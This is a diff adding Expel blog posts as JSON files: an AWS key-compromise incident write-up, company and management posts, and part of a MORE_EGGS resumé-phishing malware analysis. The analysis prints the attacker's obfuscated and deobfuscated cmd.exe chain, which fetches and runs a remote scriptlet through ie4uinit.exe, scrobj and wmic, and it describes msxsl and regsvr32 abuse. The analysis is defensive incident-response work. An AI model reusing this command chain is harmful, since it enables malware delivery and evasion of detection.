IAM principal (user, role, etc.) assume any other roles? What AWS services does this principal normally interact with? What interesting API calls has this principal made? So, when the initial lead alert for the SSH key generation came in, we quickly understood that role assumption was not in play for this compromise. If the user had assumed roles, it would have been key to identity and include them in the investigation. Instead, we saw the image below: Expel AWS AssumeRole Robot Once we knew access was limited to this IAM user, we wanted to know what AWS services this principal generally interacts with. Understanding this helps us spot outlier activity that\u2019s considered unusual for that principal. Seeing the very limited API calls to other services further indicated that something nefarious might be going on. Expel AWS Service Interaction Robot Finally, we wanted to see what interesting API calls the principal made. From a detection perspective, we define interesting API calls in this context to be mostly anything that isn\u2019t Get*, List*, Describe* and Head*. This enrichment returned 344 calls to the AuthorizeSecurityGroupIngress API from the AWS CLI user-agent. This is really the tipping point for considering this a security incident. Expel AWS Interesting API Robot How we responded After we spotted the attack, we needed to scope this incident and provide the measures for containment. We framed our response by asking the primary investigative questions. Our initial response was going to be limited to determining what happened in the AWS control plane (API). CloudTrail was our huckleberry for answering most of our questions. What credentials did the attacker have access to? How long has the attacker had access? What did the attacker do with the access? How did the attacker get access? What credentials did the attacker have access to? By querying historical CloudTrail events for signs of this attacker, Expel was able to identify that they had access to a total of eight different IAM user access keys, and was active from two different IPs. If we recall from earlier, we were able to use our robot to determine that no successful AssumeRole calls were made, limiting our response to these IAM users. How long has the attacker had access? CloudTrail indicated that most of the access keys had not been used by anyone else in the past 30 days thus we can infer that the attacker likely discovered the keys recently. What did the attacker do with the access? Based on observed API activity, the attacker had a keen interest in S3, EC2 and RDS services as we observed ListBuckets , DescribeInstances and DescribeDBInstances calls for each access key, indicating an attempt to see which of these resources was available to the compromised IAM user. As soon as the attacker identified a key with considerable permissions, DescribeSecurityGroups was called to determine the level of application tier access (firewall access) into the victim\u2019s AWS environment. Once these groups were enumerated, the attacker \u201cbackdoored\u201d all of the security groups with a utility similar to aws_pwn\u2019s backdoor_all_security_group script . This allowed for any TCP/IP access into the victim\u2019s environment. Additional AuthorizeSecurityGroupIngress calls were made for specific ingress rules for port 5432 (postgresql) and port 1253, amounting to hundreds of unique Security Group rules created. These enabled the attacker to gain network access to the environment and created additional risks by exposing many AWS service instances (EC2, RDS, etc.) to the internet. A subsequent DescribeInstances call identified available EC2 instances to the IAM user. The attacker then created a SSH key pair (our initial lead alert for CreateKeyPair ) for an existing EC2 instance. This instance was not running at the time so the attacker turned it on via a RunInstances call. Ultimately, this series of actions resulted in command line access to the targeted EC2 instance, at which point visibility can be a challenge without additional OS logging or security products to investigate instance activity. How did the attacker get credentials? While frustrating, it\u2019s not always feasible to identify the root cause of an incident for a variety of reasons. For example, sometimes the technology simply doesn\u2019t produce the data necessary to determine the root cause. In this case, using the tech we had available to us, we weren\u2019t able to determine how the attacker gained credentials, but we have the following suspicions: Given multiple credentials were compromised, it\u2019s likely they were found in a public repository such as git, an exposed database or somewhere similar. It\u2019s also possible credentials were lifted from developer machines directly, for example the AWS credentials file. We attempted to confirm these, but couldn\u2019t get to an answer in this case. Though unfortunate, it offers an opportunity to work with the victim to improve visibility. For reference, below are the Mitre ATT&CK Cloud Tactics observed during Expel\u2019s response. Initial Access Valid Accounts Persistence Valid Accounts, Redundant Access Privilege Escalation Valid Accounts Defensive Evasion Valid Accounts Discovery Account Discovery Cloud Security Threat Containment By thoroughly scoping the attacker\u2019s activities, we were able to deliver clear remediation steps. This included: Deleting the compromised access keys for the eight involved IAM user accounts; Snapshotting (additional forensic evidence) and rebuilding the compromised EC2 instance; Deleting the SSH keys generated by the attacker; And deleting the hundreds of Security Group ingress rules created by the attacker. Resilience: Helping our customer improve their security posture When we say incident response isn\u2019t complete without fixing the root of the problem \u2013 we mean it . One of the many things that makes us different at Expel is that we don\u2019t just throw alerts over the fence. That would only be sort of helpful to our customers and puts us in a position where we\u2019d have to tackle the same issue on another day \u2026 and likely on many more days after that. We\u2019re all about efficiency here. That\u2019s why we provide clear recommendations for how to solve issues and what actions a customer can take to prevent these kinds of attacks in the future. Everybody wins (except for the bad guys). While we weren\u2019t certain how the access keys were compromised in the first place, below are the resilience recommendations we gave our customer once the issue was resolved. Expel AWS Resilience (1) If the IAM user is unused, then it probably doesn\u2019t need to remain active in your account. We made this recommendation because these access keys hadn\u2019t been in use by anyone other than the attacker in the previous 30 days. Expel AWS Resilience (2) Since the access keys for this IAM principal were at least 30 days old given that no activity occurred from a legitimate user, it was time to do some tidying up, so to speak. If you need that user, rotate the access keys on a regular basis. Expel AWS Resilience (3) We noticed that this IAM user had far too many EC2 permissions and thought this resilience measure was in order. We also shared that it would be far safer to delegate those EC2 permissions with an IAM role. Lessons learned Fortunately, we were able to disrupt this attack before there was any serious damage, but it highlighted the very real fact that cloud infrastructure \u2013 whether you\u2019re running workloads on AWS or somewhere else \u2013 is a prime target for attackers. As with every incident, we took some time to talk through what we discovered through this investigation and are sharing our key lessons here. AWS customers must architect better security \u201cin\u201d the cloud. That is, create greater visibility into the EC2 and other infrastructure identified in the shared responsibility model. You can\u2019t find evil if the analysts don\u2019t know what to look for \u2013 train, train some more, and then when you\u2019re done training, train again. Special thanks to Scott Piper ( @0xdabbad00 ) and Rhino Security Labs ( @RhinoSecurity ) for their contributions to AWS security research. While security in the cloud is still relatively in its infancy, the same can be said for the attacker behaviors \u2013 much of what we observed here and in the past were elementary attack patterns. There are additional automated enrichment opportunities. We\u2019ve started working on a new AWS robotic workflow to summarize historical API usage data for the IAM principal and will compare it to the access parameters of the alert. Be on the lookout for an additional blog post in the future for our automated AWS alert enrichments. Until then, check out our other blogs to learn more about how we leverage AWS cloud security for our customers, along with tips and tricks for ramping up your own org\u2019s security when it comes to cloud." +} \ No newline at end of file diff --git a/meet-us-at-moscone-expel-makes-its-rsac-debut.json b/meet-us-at-moscone-expel-makes-its-rsac-debut.json new file mode 100644 index 0000000000000000000000000000000000000000..9ff8dd560b71e98239fa266549a308d614388a3c --- /dev/null +++ b/meet-us-at-moscone-expel-makes-its-rsac-debut.json @@ -0,0 +1,6 @@ +{ + "title": "Meet us at Moscone\u2026 Expel makes its #RSAC debut!", + "url": "https://expel.com/blog/expel-makes-its-rsa-debut/", + "date": "May 12, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Meet us at Moscone\u2026 Expel makes its #RSAC debut! Expel insider \u00b7 2 MIN READ \u00b7 KELLY FIEDLER \u00b7 MAY 12, 2022 \u00b7 TAGS: Cloud security / Company news / MDR / Tech tools Expletives have attended RSA Conference (RSAC) for years, and many attended before they were Expletives \u2014 not to mention, before there was an Expel. But this year is different. For the first time, Expel is headed to Moscone Center as an exhibitor. You could say we\u2019re pretty excited. Why are we so over-the-moon about this? A few reasons (and we\u2019re not just talking about the free swag or the trolley rides). It\u2019s a pivotal time in the detection and response market space. Mostly, because it\u2019s also a confusing time \u2014 full of options (MDR and XDR), uncertainty, and noise. With a constantly evolving threat landscape, businesses need security partners that aren\u2019t just answering their questions today but are looking ahead to prepare for the questions of tomorrow. More threats with increasing complexity mean businesses have to keep up and make sense of all the noise \u2014 fast. That\u2019s why we\u2019ve made it our mission to make security easy to understand, easy to use, and easy to continuously improve. Our promise is to show you that security can be delightful. What does that look like? Expel partners with you to create an approach that\u2019s tailored to your environment, your people, and your processes. We integrate with your existing tech to drive greater value, then through automation quickly learn to analyze and correlate alerts across your systems and attack surfaces, 24\u00d77. Our friendly bots, Josie\u2122 and Ruxie\u2122, free up our analysts so they can make the quick, well-informed decisions best suited to humans. Josie analyzes alerts as they come in for triage, surfacing the most important ones, and Ruxie gives analysts critical information about threats so they can strategize on the best remediation approach. It\u2019s how tech and people should work together. The result? A platform that makes it easier to detect, understand, and fix issues fast so business risk is managed. Breathe easier knowing your team has the answers they need, when they need them. Really, it\u2019s security that makes sense. We can\u2019t wait to share this approach to security with you. Just like in years past, RSAC is a great place to connect with old friends, shake new hands, and of course, talk security. The difference is that this year, we\u2019ll do it at our own booth. Stop by the Expel booth (S649) in the South Hall to meet our crew, check out a demo, enjoy some live freestyle rap from YouTube sensation, Harry Mack (seriously!). While you\u2019re there, catch up with Josie and Ruxie \u2014 you might even snag a cool plushie\u2026 Before the conference, get a sneak-peek at what it\u2019s like to work with Expel with this overview video . Ready to talk shop? Go ahead and schedule a meeting ." +} \ No newline at end of file diff --git a/mission-matters-watch-your-signals.json b/mission-matters-watch-your-signals.json new file mode 100644 index 0000000000000000000000000000000000000000..f6ada7f030315e0829a5fd4973d7bc2caff7cc85 --- /dev/null +++ b/mission-matters-watch-your-signals.json @@ -0,0 +1,6 @@ +{ + "title": "Mission matters: watch your signals", + "url": "https://expel.com/blog/mission-matters-watch-signals/", + "date": "Sep 28, 2017", + "contents": "Subscribe \u00d7 EXPEL BLOG Mission matters: watch your signals Talent \u00b7 3 MIN READ \u00b7 YANEK KORFF \u00b7 SEP 28, 2017 \u00b7 TAGS: Employee retention / Great place to work / Management / Mission I was at a company-wide all hands meeting and one of the executives came on stage to rally the troops, like you do. There was music, there was fanfare, there was applause and I probably wanted to be elsewhere. Not into the cyber-rockstar thing. Still, don\u2019t let the show fool you \u2013 he was a sharp executive. Particularly in his understanding of capital market dynamics: the push and pull of investor confidence, industry headwinds and tailwinds, and the undercurrent of human emotion that fuels the availability of capital in the first place. In the course of his address, the statement \u201cour product is our stock price\u201d happened to come out. No wait, that was on Silicon Valley . But close enough. Y\u2019know, if you\u2019re a shareholder\u2026 you\u2019re damn right it is. In fact, if you\u2019re at the company primarily because of your equity\u2026 that view is pretty compelling. If the stock price goes up, you win. It\u2019s easy to align around that mission if you\u2019re holding the right cards. But what if you\u2019re not? If you happen to be, say\u2026 on the security team, and your vested interest in the company revolves more around what it does for customers than what it yields to investors, what does that message do for you? If you\u2019re thinking \u201cabsolutely nothing,\u201d it turns out it\u2019s a little worse than that. You\u2019ll come out of that all-hands even less motivated than you were when you walked in. Hearing that your company\u2019s raison d\u2019\u00eatre is about putting dollars into already dollar-laden pockets is simply not a compelling message (or a compelling reason to come to work). A message like \u201cwe\u2019re here to keep our customers safe,\u201d or \u201cwe want to level the playing field,\u201d or even \u201cwe\u2019re here to stick our finger in Sauron\u2019s eye or die trying,\u201d\u2026 that\u2019s what you\u2019re there for. Well, that\u2019s great and all, but if you\u2019re in charge of security at a larger company whose mission actually has nothing to do with security, then it falls on you to make sure your team understands that THEIR mission isn\u2019t quite so transactional. Here are four things you can start working on today to set the tone for security in your organization that will have a lasting impact on your team. 1. Check compensation Mission matters, but so do basic financials that allow for a place to live and eat. No, the world is not so simplistic as Maslow would have you believe , but you know as well as I how competitive the security space is. You can\u2019t turn on a cyber Twitter feed without at least three \u201c OMG TALENT SHORTAGE \u201d headlines scrolling by these days. Over-dramatized clickbait as it may be, your security staff can likely get a job somewhere else and make more money at any point. Get access to market data and make sure you, your boss, and your HR team are educated on the realities of the security talent pool. 2. Define your mission and vision Why do you exist? What exactly are your doing for your customers? How do you know when you\u2019re successful? There\u2019s no end of information about how to establish these so I\u2019m not going to rehash that here, but it\u2019s worth taking time out of your day, and with the support of your team, to ensure everyone is aligned on these two statements. 3. Check your culture The #1 pitfall of mission/vision efforts at any company is not letting the words you write down alter behavior. Netflix captures this best in their deliberate, documented approach to culture. Do your decisions align with your culture? Do they align with your mission, and will they help you achieve your vision? \u201cMany companies have value statements, but often these written values are vague and ignored. The real values of a firm are shown by who gets rewarded or let go.\u201d \u2013 Netflix 4. Tell stories It may feel a bit weird to jump from b-school propaganda to your kids\u2019 pre-bedtime activities, but being able to tell a great story is an essential part of management in general\u2026 and especially important in high-stress, high-impact work like security analysis and incident response. Not only do stories allow your security team to relive and celebrate their achievements ( versus pushing happiness past the cognitive horizon ), it builds credibility across the organization and reminds everyone what they\u2019re working for. One step at a time Realistically, there\u2019s no shortage of work for you to tackle. Taking a step back to focus on something as high level as mission or vision might look like a waste of time. For some, \u201cdealing with HR\u201d is a trial unto itself that you\u2019ll want to put off as long as possible. If nothing else, you probably already have a staff meeting every week. Next week, add a story. If a particularly good one pops up, find a way to share it with teams outside your organization. Get a few wins under your belt and build up the energy to tackle some of the higher level (but likely more impactful) work of 1 \u2013 3. Best of luck! \u2014 This is the third part of a five part series on key areas of focus to improve security team retention. Read from the beginning, 5 ways to keep your security nerds happy , or continue to part four ." +} \ No newline at end of file diff --git a/mistakes-to-avoid-when-measuring-soc-performance.json b/mistakes-to-avoid-when-measuring-soc-performance.json new file mode 100644 index 0000000000000000000000000000000000000000..abbd817d32eeedaf3e290bab06916af1c7011371 --- /dev/null +++ b/mistakes-to-avoid-when-measuring-soc-performance.json @@ -0,0 +1,6 @@ +{ + "title": "Mistakes to avoid when measuring SOC performance", + "url": "https://expel.com/blog/mistakes-avoid-measuring-soc-performance/", + "date": "Sep 27, 2017", + "contents": "Subscribe \u00d7 EXPEL BLOG Mistakes to avoid when measuring SOC performance Security operations \u00b7 4 MIN READ \u00b7 JUSTIN BAJKO \u00b7 SEP 27, 2017 \u00b7 TAGS: Management / Metrics / SOC \u201cWhat gets measured gets managed.\u201d I heard this line repeated like a mantra early in my career whenever a new metrics program was being introduced in our security operations center (SOC). Unfortunately, nobody handed out magnifying glasses. That would have been helpful to read the six-point font metric-filled spreadsheet once it was printed out. We measured everything every manager could think to measure. The result? Our metrics improved but our outcomes didn\u2019t. For example, instead of taking the time to troubleshoot device outages when an associated ticket hadn\u2019t been updated in a week, employees started simply updating the tickets with lines that said, \u201cDevice still not connected,\u201d and moving on because they were being measured on the number of tickets worked. And this is the problem when you\u2019re developing your first set of operational metrics. If you\u2019re not thoughtful about the things that you measure and why you\u2019re measuring them, you can end up managing to the wrong outcomes. So, why do companies get it wrong so frequently? It\u2019s not that they\u2019re measuring the wrong things. Most often, companies are measuring the \u201cright thing,\u201d but they\u2019re doing it in the wrong way or for the wrong reasons. Here are the three most common mistakes I see companies make when they start measuring their SOC\u2019s performance. 1. Counting all the things Let\u2019s start with these statements. Which do you think is better? \u201cWe detected three more incidents this month! Success!\u201d vs. \u201cWe had three fewer incidents this month! Success!\u201d How do you know what the right number is? More important, do you know why you\u2019re counting these things in the first place? Are you concerned that you\u2019re missing things? If so, it probably makes sense to focus on uncovering more incidents. If you\u2019re focused on making your organization more resilient to attacks and you\u2019ve spent a lot of effort on prevention, then it\u2019s reasonable to want to see a reduction in the total number of incidents. Either way, it\u2019s important to realize that the outcome you\u2019re trying to achieve can change, so using a metric like this by itself and without context is rife with risk. Another popular metric is the aggregate number of alerts in \u201cLow,\u201d \u201cMedium,\u201d \u201cHigh,\u201d and \u201cCritical\u201d severity buckets. Let\u2019s face it, \u201cCritical\u201d is what gets all the airtime. But watch out for misaligned objectives when it comes to severity. It\u2019s easy to perceive more value as you find more \u201csuper bad\u201d things But it\u2019s easy for people to game the system when you look at things through this lens. Non-severe alerts start to get artificially dispositioned as critical and it can distract your team from real problems. Finally, counting things for the sake of counting things can be bad for your team. People don\u2019t like being measured for reasons they don\u2019t understand or on things they perceive to be wrong. And believe me, they\u2019ll know it\u2019s wrong well before you do. If your team feels like they\u2019re spending their time on the wrong things or being evaluated in the wrong way, they\u2019ll leave. 2. Faster is always better Speed is important when it comes to detecting and responding to threats. After all, if you\u2019re too slow, one compromised laptop can quickly spiral into an event where your most valuable data walks out the front door. But measuring people and processes based on speed alone can result in the wrong behavior. It can lead to quality issues \u2014 and yet again \u2014 drive people to game the system. Requiring your analysts to complete an investigation in 10 minutes sounds fine on the surface, but if you constrain an analyst\u2019s ability to actually dig into an incident and find out what\u2019s really going on for the sake of time, you\u2019re likely to miss critical details and negatively impact your response to that incident. 3. More money, more tools! (or is it less money, fewer tools?) Everyone has a budget. And everyone gets measured on how they spend against that budget. That\u2019s not going to change any time soon, and I\u2019m not advocating for it to change. However, spending less doesn\u2019t necessarily mean you\u2019re being a savvy spender. Likewise, spending more doesn\u2019t automatically make you more mature. Cutting costs in the wrong areas can create visibility issues, make you more vulnerable, and ultimately create a level of risk that\u2019s far greater than the business truly understands. To complicate matters, if your cost cutting decreases your visibility, that\u2019ll make it even harder to calculate risk for the business. But the flip side isn\u2019t exactly the promised land, either. Collecting all the latest cutting-edge security hotness that you heard about at RSA often does more harm than good. When you buy a new security tool, you need to have a plan for how you\u2019re going to use it: you need to understand what problem you have that this tool is supposed to solve, your team needs to know how to use it, and you guessed it, you need to know how you\u2019re going to measure its performance. What\u2019s the impact of throwing money at cool new technology without understanding how it fits into your organization? Oddly enough, it\u2019s similar to what happens when you try to cut costs without a plan \u2013 reduced visibility, increased vulnerability, and potentially increased risk to your environment. And don\u2019t forget: how budgets get spent and what products to buy next are decisions that are often heavily influenced by what you\u2019re measuring. If you\u2019re measuring the wrong things, you allocate resources incorrectly and the vicious cycle continues. So, what now? Okay. I\u2019ve spent a good bit of time talking about some of the most common mistakes that I see when organizations start to measure the performance of their SOC. Hopefully, I\u2019ve whet your appetite to hear about some of the innovative things I\u2019ve seen organizations do to effectively measure their SOC\u2019s performance. Stay tuned for our next post on this subject." +} \ No newline at end of file diff --git a/month-to-month-pricing-in-uncertain-times.json b/month-to-month-pricing-in-uncertain-times.json new file mode 100644 index 0000000000000000000000000000000000000000..a212493fd35ee7873054ce31d949a7005b16f54b --- /dev/null +++ b/month-to-month-pricing-in-uncertain-times.json @@ -0,0 +1,6 @@ +{ + "title": "Month-to-month pricing in uncertain times", + "url": "https://expel.com/blog/month-to-month-pricing/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG Month-to-month pricing in uncertain times Security operations \u00b7 1 MIN READ \u00b7 MATT PETERS \u00b7 APR 3, 2020 When we founded Expel nearly four years ago, we set out to provide our customers with greater peace of mind about security \u2013 whether they\u2019re operating \u201cbusiness as usual\u201d or facing more challenging circumstances. There\u2019s plenty of uncertainty in our world right now, which is why we\u2019re introducing a new way for new customers to get 24\u00d77 security monitoring and response from us: monthly pricing for the first year. Starting today, you can sign up for Expel 24\u00d77 monitoring, pay us monthly for the first year and give us 30 days\u2019 notice if you need to cancel. Sound easy? That\u2019s because it is. Whether you need some extra support while your security and IT teams go remote, want to focus on more urgent security priorities or just aren\u2019t in a position to make an annual commitment \u2013 we\u2019re committed to helping you quickly address your unique challenges in a way that works best for you. You\u2019ve probably got questions \u2026 We get it. We\u2019ve tried to keep things simple and, of course, transparent. How does this new pricing option work? In short, you pay for Expel service on a monthly basis (as opposed to an annual one) during the first year. If you want to cancel any time during the first year, just give us 30 days\u2019 notice. After the first 12 months of service, the contract converts to an annual contract paid in advance. How much does it cost? When you choose an annual contract, it\u2019s 15% less than the first-year-monthly pricing. You can see actual pricing on our pricing page . Why are you doing this? We know many orgs are facing difficult times. We want to help reduce anxiety. We think this can help: Organizations that need short-term coverage over the next few months Organizations with uncertain budgets that can\u2019t commit to a 12-month contract right now Organizations with new pandemic-related purchasing hurdles introduced into their buying processes, but want to get started right away Do I get the same service that customers on annual billing cycles are getting? Yep! The service is exactly the same. Anything else I should know? The pricing option is only available for contracts signed by September 30th, 2020. You can read the nitty gritty terms and conditions right here. Want to hear more? We\u2019d love to talk with you. Send us a note!" +} \ No newline at end of file diff --git a/more-eggs-and-some-linkedin-resume-spearphishing.json b/more-eggs-and-some-linkedin-resume-spearphishing.json new file mode 100644 index 0000000000000000000000000000000000000000..ae7a66cbe71720c60f73646d855942789b1364a7 --- /dev/null +++ b/more-eggs-and-some-linkedin-resume-spearphishing.json @@ -0,0 +1,6 @@ +{ + "title": "MORE_EGGS and Some LinkedIn Resum\u00e9 Spearphishing", + "url": "https://expel.com/blog/more-eggs-and-some-linkedin-resume-spearphishing/", + "date": "Aug 25, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG MORE_EGGS and Some LinkedIn Resum\u00e9 Spearphishing Security operations \u00b7 14 MIN READ \u00b7 KYLE PELLETT AND ANDREW JERRY \u00b7 AUG 25, 2022 \u00b7 TAGS: MDR The \u201cGreat Resignation\u201d has recruiters working overtime scouring LinkedIn resum\u00e9s for potential candidates. Unfortunately, some of these resum\u00e9s are posted by bad actors taking advantage of the situation. With a new twist on the MORE_EGGS family of malware, attackers are throwing their names in the ring by submitting poisoned resum\u00e9s to job recruiters . The Expel SOC recently spotted a deployment of this technique. The victim\u2019s computer was infected and the malware payload tried to exfiltrate data within a few minutes. How we spotted our initial lead So, to be honest, malware sometimes acts so quickly that multiple alerts sound before one of our analysts can start the triage process. As you\u2019d imagine, we\u2019re automatically suspicious when we see multiple alerts fire for the same activity. It tells us that something strange is happening. In this case, we received seven unique Microsoft Defender for Endpoint alerts within a few seconds for activity that clearly (for reasons explained below) resembled malicious code execution. This tipped our SOC analysts to an attack that was well under way \u2014 action to contain the host was needed urgently. After this type of malware gains initial access \u2014 even if partially blocked by existing security controls \u2014 the attack can spread quickly and deploy code execution , defense evasion , and command and control techniques (in this case the answer was D \u2014 all of the above). This is why a detection strategy that covers all parts of the MITRE ATT&CK framework is so important. In this case, Defender for Endpoint caught the use of XSL Script Processing first. Cybersecurity is sometimes a battle of humans vs computers, and humans have the disadvantage with respect to time. A lot can happen in one \u201ccomputer second,\u201d and tech like the Expel Workbench\u2122 and Ruxie\u2122 help level the field by transforming alert data into intel our SOC analysts can quickly respond to while an attack is under way. (More on how we use Defender\u2019s features to our advantage here .) Let\u2019s take a look at one of several Microsoft Defender for Endpoint alerts we received, how the Expel Workbench helped guide our analysts to find important information quickly, and how we inferred that this attack was in progress. Can you spot the evil here? Here\u2019s what we saw in the recent process activity: We see regsvr32 attempting to execute 42981.ocx , which is similar to a technique used by malware (such as QBot and Lokibot ). This is a pretty good giveaway that some malicious code has been executed; it\u2019s written this 42981.ocx file to disk, and has now called regsvr32 to run whatever code lies within this DLL file. The process arguments of cmd.exe are heavily obfuscated , an indication of an attacker trying to evade detection. One thing that isn\u2019t obfuscated is johndoe[.]com/kbvbskrvf , a likely suspect for a command and control IOC. This alert is looking for discovery activity or \u201cSuspicious sequence of exploration activities.\u201d We see this in the command cmd /v /c nltest /trusted_domains outputting to a text file in a temporary directory, which is consistent with identifying domains trusted by this host \u2014 quite unusual if you ask us. msxsl.exe is a deprecated XML parsing tool with a well documented use case for executing code and bypassing application controls \u2014 here we see it trying to run an obscurely named text file. We also observe wmic creating the process ie4uinit.exe -basesettings . This is another LOLBAS (living off the land binary, script, or library) like msxsl.exe that can easily execute code because it can execute commands from a specially prepared ie4uinit.inf file. Okay, so a lot of bad stuff going on\u2026and so far, not a lot of answers to how this happened. At this point, we declared an incident, notified our customer, and sent them remediation actions to contain the host and block communications with johndoe[.]com (Side note: This is not the real C2 we observed, but in the interest of protecting the anonymity of the user the attackers impersonated, we refer to them as johndoe for this blog.) Identifying the root cause The next question we wanted to answer: How did this malware infection get here? We used the customer\u2019s EDR tool to review the timeline and walk back through the chain of events that ultimately led us to an event involving Outlook.exe. OUTLOOK.EXE opened the http link hxxps://www.linkedin[.]com/e/v2?e=-1swgqb-l437ev7b-v3&lipi=urn%3Ali%3Apage%3Aemail_email_jobs_new_applicant_01%3Bgo6DX7fyT96rJM8b2IE8Fw%3D%3D&t=plh&ek=email_jobs_new_applicant_01&li=0&m=email_jobs_new_applicant&ts=job_posting_download_resume&urlhash=quvr&url=https%3A%2F%2Fwww%2Elinkedin%2Ecom%2Ftalent%2Fapi%2FtalentResumes%3FapplicationId%3D10266114276%26tokenId%3D2155098668%26checkSum%3DAQGkxf8BsoxNsmZdzes9P0qm-HMeqGo9oXk The user clicked on a link in an email from a legitimate sender to a legitimate domain; based on the requested resource, it appears they were seeking a resum\u00e9 for a job posting. This is interesting for a couple of reasons. The attackers evaded inbox malspam detection using a legitimate email sender The document is likely expected, based on a job posting created by the targeted user The link in the email also appears legitimate Unfortunately, our target still fell prey to a malicious phishing document. So what happens if the victim clicks through to download the resum\u00e9 from LinkedIn? To find out, we followed the trail and discovered a PDF crafted to present the viewer with an error. The error is actually an attempt to lure the victim to an unsafe site where they can download General-Manager-resum\u00e9.docx (the file is presented as a Word document). Of course, this is suspicious to us because we know what happens. But an everyday user recruiting from LinkedIn has probably seen resum\u00e9s that aren\u2019t compatible with their software. This seems to be what the attackers are counting on. Notably, the domain johndoe[.]com aligns with what the recruiter expects to see based on the applicant\u2019s name. (It was later discovered that the victim was in fact a recruiter and wasn\u2019t aware of a problem with their host after following this funnel.) What happened to the host? So what happens when the user clicks on the .docx link? Well, as it turns out, a bunch of things (before the user is finally presented with a word document). First of all, the file that lands on the victim\u2019s disk is actually a zip archive by the same name \u4e00 General Manager Resume 1.zip. Once the zip is written to disk, we immediately see it create John Doe CV.lnk. At this point we see a familiar code execution from one of our alerts: Obfuscated \"cmd.exe\" /v /c set \"979113wEX=set\" && call set \"979113gn=%979113wEX:~0,1%\" && (for %p in (c) do @set \"979113QCH=%~p\") && !979113gn!et \"979113XI=e\" && !979113gn!!979113XI!t \"979113rKw=$w\" && s!979113XI!t \"979113bCj=i\" && set \"979113FL=a\" && s!979113XI!t \"979113jnI=t\" && !979113gn!et \"979113pHq=d\" && s!979113XI!t \"979113mJ=.\" && s!979113XI!t \"979113MAn=init\" && set \"979113TQ=s!979113bCj!\" && s!979113XI!t \"979113Jq=s!979113XI!tt!979113bCj!ngs\" && s!979113XI!t \"979113Pnd=.!979113bCj!nf\" && set \"979113PN=i!979113XI!u!979113MAn!!979113Pnd!\" && s!979113XI!t \"979113ED= = \" && !979113gn!et \"979113AS=s!979113bCj!gnatur!979113XI!!979113ED!\" && s!979113XI!t \"979113vY=all!979113mJ!win\" && set \"979113ixY=de\" && s!979113XI!t \"979113Dtp=ch\" && call !979113gn!!979113XI!t \"979113YM=C:UsersAppDataRoamingM!979113bCj!crosoft\" && s!979113XI!t \"979113nT=!979113YM!!979113PN!\" && set \"979113of=\"^\" && (for %h in (\"[vers!979113bCj!on]\" \"!979113AS!!979113rKw!!979113bCj!ndows nt$\" \"[!979113ixY!stinationdirs]\" \"F00BE!979113ED!01\" \"[!979113ixY!faultinst!979113vY!dows7]\" \"UnRegist!979113XI!rOCXs!979113ED!3DF1\" \"!979113pHq!elfiles!979113XI!F00BE\" \"[3DF1]\" \"%11%scRo%979113yd%j,NI,%979113RHZ%%979113BCS%%979113BCS%p%979113zL%%979113rf%%979113rf%johndoe.com/kbvbskrvf\" \"[F00BE]\" \"ieu%979113GjL%!979113Pnd!\" \"[strings]\" \"979113GjL=!979113MAn!\" \"979113BCS=t\" \"servicename' '\" \"979113RHZ=h\" \"979113zL=:\" \"979113rf=/\" \"shorthvcname= \" \"979113FPK=com\" \"979113yd=b\") do @e!979113Dtp!o %~h)>\"!979113nT!\" && set \"979113jgm=ie4uinit.exe\" && call copy /Y C:windowssystem32!979113jgm! \"!979113YM!\" > nul && st!979113FL!rt \"\" /MIN wm!979113bCj!c proc!979113XI!ss call cr!979113XI!ate \"!979113YM!!979113jgm! -bas!979113XI!!979113Jq!\" Deobfuscated \"cmd.exe\" /v /c (for h in (\"[version]\" \"signature = $windows nt$\" \"[destinationdirs]\" \" 01 = 01\" \"[defaultinstall.windows7]\" \"UnRegisterOCXs = 3DF1\" \"delfileseF00BE\" \"[3DF1]\" \"11scRobj,NI,http://johndoe.com/kbvbskrvf\" \"[F00BE]\" \"ieuinit.inf\" \"[strings]\" \"init=init\" \"t=t\" \"servicename' '\" \"h=h\" \":=:\" \"/=/\" \"shorthvcname= \" \"979113FPK=com\" \"b=b\") do @echo ~h)>\"C:UsersAppDataRoamingMicrosoft.infieuinit.inf\" && set \"ie4uinit.exe=ie4uinit.exe\" && call copy /Y C:windowssystem32ie4uinit.exe \"C:UsersAppDataRoamingMicrosoft\" > nul && stirt \"\" /MIN wmic process call create \"C:UsersAppDataRoamingMicrosoftie4uinit.exe -basesettings\" This command accomplishes a few things. It: points to http://johndoe[.]com/kbvbskrvf, a malicious resource hosted on the C2 domains UnRegisterOCXs to fetch and run the malicious resource using scrobj writes it as the file \u201cieuinit.inf\u201d and puts it in C:UsersAppDataRoamingMicrosoft.infieuinit.inf copies the legitimate ie4uinit.exe from C:windowssystem32ie4uinit.exe and uses WMIC to create the process in C:UsersAppDataRoamingMicrosoftie4uinit.exe This is indicative of the fileless malware execution technique used by GANDCAB, described here . (Further credit to the BOHOPS description of misuse of .inf files, UnRegisterOCXSection and scrobj.dll .) Whenever we see legitimate Windows binaries where no vendors have determined the hash for ie4uinit.exe to be malicious, their occurrence outside the normal/expected path raises suspicions. According to VirusTotal , the file isn\u2019t signed, but appears to be copywritten by Microsoft and is a component of Internet Explorer. Within a millisecond of execution of the obfuscated cmd.exe process, we see the following wmic process. wmic process call create \"C:UsersAppDataRoamingMicrosoftie4uinit.exe -basesettings\" Another signed binary, msxsl.exe , is also placed in the AppdataRoaming directory. The attackers now have two signed binaries at their disposal in an unprotected location: C:UsersAppDataRoamingMicrosoftmsxsl.exe. Both ieuninit.exe and msxsl.exe were placed in AppdataRoaming for later use. All of this happened in seconds \u30fcwhile the victim was waiting for the resum\u00e9 to load \u30fc and we see one more command before the victim is presented with a Word doc \u30fc the decoy resum\u00e9). The signed binary is in an unusual location \u30fc C:UsersAppDataRoamingMicrosoftie4uinit.exe \u30fc and is using wmic to adjust token privileges to allow the following privileges to the user\u2019s access token: Shutdown, Undock, IncreaseWorkingSet, TimeZone. This was followed by the execution of a script by ie4uinit.exe out of AppDataRomaing. The following AMSI content was recorded. See Appendix A : At first glance, this looks like an obfuscated javascript with function calls containing the following human-readable operations: return String.fromCharCode return new ActiveXObject return Math.floor(Math.random() * 65536 .writeText .saveToFile {if (typeof WScript === \u2018object\u2019) {return true; RegRead GetObject .Create Without completely deobfuscating this, we can guess the intent is to run a function after obfuscating the data with String.fromCharCode. This works by naming hexadecimal values as Unicode values, which are finally converted to characters. Here\u2019s the slightly deobfuscated pretty version: See Appendix B : The script then takes the string and writes an ActiveXobject with what\u2019s expected to be a WScript file: lgnsyjcm9801.saveToFile(lgnsyjcm4315); 